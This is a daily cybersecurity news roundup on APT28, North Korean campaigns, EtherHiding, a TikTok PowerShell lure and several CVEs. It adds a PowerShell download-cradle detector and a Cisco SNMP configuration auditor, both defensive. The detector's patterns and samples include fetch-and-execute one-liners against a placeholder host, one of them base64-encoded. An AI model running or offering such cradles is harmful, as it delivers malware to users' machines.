
Daily Cybersecurity Roundup, October 17, 2025

Recent cyber activity highlights escalating threats from both state-sponsored and financially motivated actors. Russia-backed APT28 has launched a sophisticated campaign targeting Ukrainian military personnel to deploy BeardShell and Covenant malware. Meanwhile, a North Korea-linked group is conducting a new campaign, “ClickFake Interview,” which delivers OtterCandy, a dual-purpose RAT and information stealer. In parallel, Microsoft reported that the UAE ranked 9th globally and Saudi Arabia 23rd in cyber activity impact, with over 80% of attacks motivated by data theft for financial gain. Read further for more cybersecurity updates from the last 24 hours.

01

APT28, a Russian state-sponsored threat actor, has launched a cyberattack targeting Ukrainian military personnel through weaponized Office documents that deliver the BeardShell backdoor and Covenant, an open-source .NET command-and-control framework.

02

A new malware campaign dubbed “ClickFake Interview” by North Korea-linked group WaterPlum’s Cluster B is deploying OtterCandy, which operates as both a RAT and an info-stealer.

03

North Korean hackers have been found using a blockchain-based technique called “EtherHiding” to deliver malware and facilitate cryptocurrency theft. EtherHiding stores payloads inside smart contracts on public blockchains, so a read-only contract call retrieves the next stage and there is no conventional hosting server for defenders to take down.

04

A TikTok campaign is promoting fake software activation methods that lead to malware installation by tricking viewers into running malicious PowerShell commands on their own machines.
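The lure relies on the victim pasting a one-line PowerShell download cradle, so the detection opportunity is in PowerShell script block logging. The script below is an added example, not code from the roundup or from the researchers who reported the campaign: it scores script block text against a small, assumed indicator vocabulary (in-memory executor, web download cradle, hidden window, encoded command) and unpacks `-EncodedCommand` payloads before matching, since the same cradle is often hidden that way. The sample blocks are constructed to resemble the ScriptBlockText field of PowerShell event 4104; a real deployment would feed that field from the log source.

```python
"""Flag ClickFix-style PowerShell one-liners in script block log text.

Added example, not from the roundup or the researchers behind it. The
indicator list is an assumption (typical download-cradle vocabulary), and
SAMPLE_BLOCKS are constructed to resemble the ScriptBlockText field of
PowerShell event 4104; a real deployment would read that field from the log.
"""
import base64
import re

# Vocabulary of "paste this to activate" lures: a download cradle (irm/iwr/
# DownloadString) fed into an in-memory executor (iex), plus the switches
# used to hide the window, skip profiles and bypass execution policy.
CRADLE_PATTERNS = [re.compile(p) for p in (
    r"\b(iex|invoke-expression)\b",
    r"\b(irm|invoke-restmethod|iwr|invoke-webrequest)\b",
    r"\.downloadstring\s*\(",
    r"frombase64string\s*\(",
    r"-(w|windowstyle)\s+hidden",
    r"-(nop|noprofile)\b",
    r"-(ep|executionpolicy)\s+bypass",
)]
# -EncodedCommand carries base64 of UTF-16LE script text.
ENCODED_RE = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text):
    """Return the decoded script text of every -EncodedCommand argument."""
    decoded = []
    for m in ENCODED_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(2)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64/UTF-16: the raw view is still scanned
    return decoded


def indicators(text):
    """Indicator patterns matched in the block or in its decoded -enc payloads."""
    hits = set()
    for view in [text] + decode_encoded_commands(text):
        low = view.lower()
        for pat in CRADLE_PATTERNS:
            if pat.search(low):
                hits.add(pat.pattern)
    return sorted(hits)


def is_suspicious(text, threshold=2):
    """Two independent indicators (e.g. cradle + executor) are enough to alert."""
    return len(indicators(text)) >= threshold


def scan(blocks):
    """Return (block, indicators) for every block that trips the threshold."""
    return [(b, indicators(b)) for b in blocks if is_suspicious(b)]


# Constructed samples, not real telemetry.
SAMPLE_BLOCKS = [
    # benign administrative block
    "Get-Service | Where-Object Status -eq 'Running' | Select-Object Name",
    # the one-liner a video tells the viewer to paste into the Run dialog
    "iex (irm https://example.invalid/activate)",
    # the same cradle hidden behind -EncodedCommand with a hidden window
    "powershell -nop -w hidden -enc "
    + base64.b64encode("iex (irm https://example.invalid/p)".encode("utf-16-le")).decode(),
]

if __name__ == "__main__":
    for block, hits in scan(SAMPLE_BLOCKS):
        print("SUSPICIOUS:", block[:60], hits)
```

The threshold of two indicators keeps a lone `Invoke-WebRequest` in an admin script from alerting, while a cradle piped into `iex`, or any hidden-window encoded command, still trips it; tune the vocabulary to the lures seen in your own telemetry.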

05

UNC5142 is using blockchain smart contracts (the same EtherHiding pattern) and compromised WordPress sites to distribute a range of info-stealers, including Atomic and Vidar, against both Windows and macOS systems.

06

Microsoft reported that the UAE ranked 9th globally and Saudi Arabia 23rd for cyber activity impact, with most attacks—over 80%—driven by data theft for financial gain, 52% tied to ransomware or extortion, and just 4% to espionage.

07

Attackers have exploited a recently patched vulnerability, CVE-2025-20352, in the SNMP subsystem of Cisco IOS and IOS XE to gain remote code execution on network devices, with observed targets including Catalyst 9400 and 9300 switches and legacy 3750G series devices. Cisco's advisory notes that exploitation requires valid SNMP credentials: a read-only community string or SNMPv3 user is enough to crash a device, and code execution additionally requires administrative (privilege 15) credentials. Until devices are patched, restricting SNMP to trusted management hosts and rotating community strings reduces exposure.
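Because the bug is reachable only with valid SNMP credentials, the practical pre-patch question is how exposed a device's SNMP configuration already is. The following script is an added example, not from the roundup or from Cisco: it audits saved IOS/IOS XE configuration text for the settings that widen SNMP exposure (read-write or well-known community strings, communities with no source access-list, SNMPv3 groups without authentication or users without privacy). The checks are generic hardening practice rather than a test for this CVE, and the sample configuration is constructed for illustration.

```python
"""Audit Cisco IOS / IOS XE configuration text for SNMP exposure.

Added example, not from the roundup, the reporting vendor or Cisco. It
applies generic SNMP hardening checks to saved config text; SAMPLE_CONFIG
is constructed for illustration, and WEAK_COMMUNITIES is an assumed list.
"""

WEAK_COMMUNITIES = {"public", "private", "cisco", "secret", "community"}


def _parse_community(tokens):
    """Interpret the words after 'snmp-server community <string>'.

    IOS syntax: [view NAME] [ro | rw] [ipv6 NACL] [ACL-NUMBER | ACL-NAME]
    """
    view, mode, acl = None, "RO", None
    i = 0
    while i < len(tokens):
        t = tokens[i].lower()
        if t == "view" and i + 1 < len(tokens):
            view, i = tokens[i + 1], i + 2
        elif t in ("ro", "rw"):
            mode, i = t.upper(), i + 1
        elif t == "ipv6" and i + 1 < len(tokens):
            i += 2  # IPv6 ACL; this check only tracks the IPv4 one
        else:
            acl, i = tokens[i], i + 1  # trailing word is the IPv4 ACL
    return view, mode, acl


def audit_snmp(config_text):
    """Return [(config_line, finding)] for lines that widen SNMP exposure."""
    findings = []
    for raw in config_text.splitlines():
        line = raw.strip()
        words = line.split()
        if len(words) < 3 or words[0] != "snmp-server":
            continue
        kind = words[1]
        if kind == "community":
            _, mode, acl = _parse_community(words[3:])
            if words[2].lower() in WEAK_COMMUNITIES:
                findings.append((line, "well-known community string"))
            if mode == "RW":
                findings.append((line, "read-write community"))
            if acl is None:
                findings.append((line, "no access-list restricting SNMP sources"))
        elif kind == "group" and len(words) >= 5 and words[3] == "v3":
            if words[4].lower() == "noauth":
                findings.append((line, "SNMPv3 group without authentication"))
        elif kind == "user" and "v3" in words:
            if "priv" not in (w.lower() for w in words):
                findings.append((line, "SNMPv3 user without privacy (encryption)"))
    return findings


# Constructed configuration, not from any real device.
SAMPLE_CONFIG = """\
hostname edge-sw1
!
snmp-server community public RO
snmp-server community secretRW RW 10
snmp-server community ops-ro RO 10
snmp-server group NMS v3 priv
snmp-server user nms NMS v3 auth sha Passw0rd! priv aes 128 Passw0rd!
snmp-server group LEGACY v3 noauth
snmp-server location dc1-row3
access-list 10 permit 10.0.0.5
"""

if __name__ == "__main__":
    for line, finding in audit_snmp(SAMPLE_CONFIG):
        print(f"{finding}: {line}")
```

Run it against `show running-config` output collected by your config-backup tooling; every community without an ACL, and every read-write community, is a credential that turns this authenticated bug into a remote one for anyone who can reach UDP/161.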

08

ConnectWise has issued a critical security update for its Automate platform after discovering two vulnerabilities, CVE-2025-11492 and CVE-2025-11493, that could allow an on-path attacker to intercept and tamper with agent software updates.

09

Researchers have uncovered a critical vulnerability in WatchGuard Fireware OS, CVE-2025-9242, an out-of-bounds write in the iked (IKEv2 VPN) process that allows unauthenticated remote attackers to execute arbitrary code.

10

Conceal, a cybersecurity firm, secured $26 million in a Series B round led by Two Bear Capital, with participation from Allegis Cyber and Gula Tech Adventures.
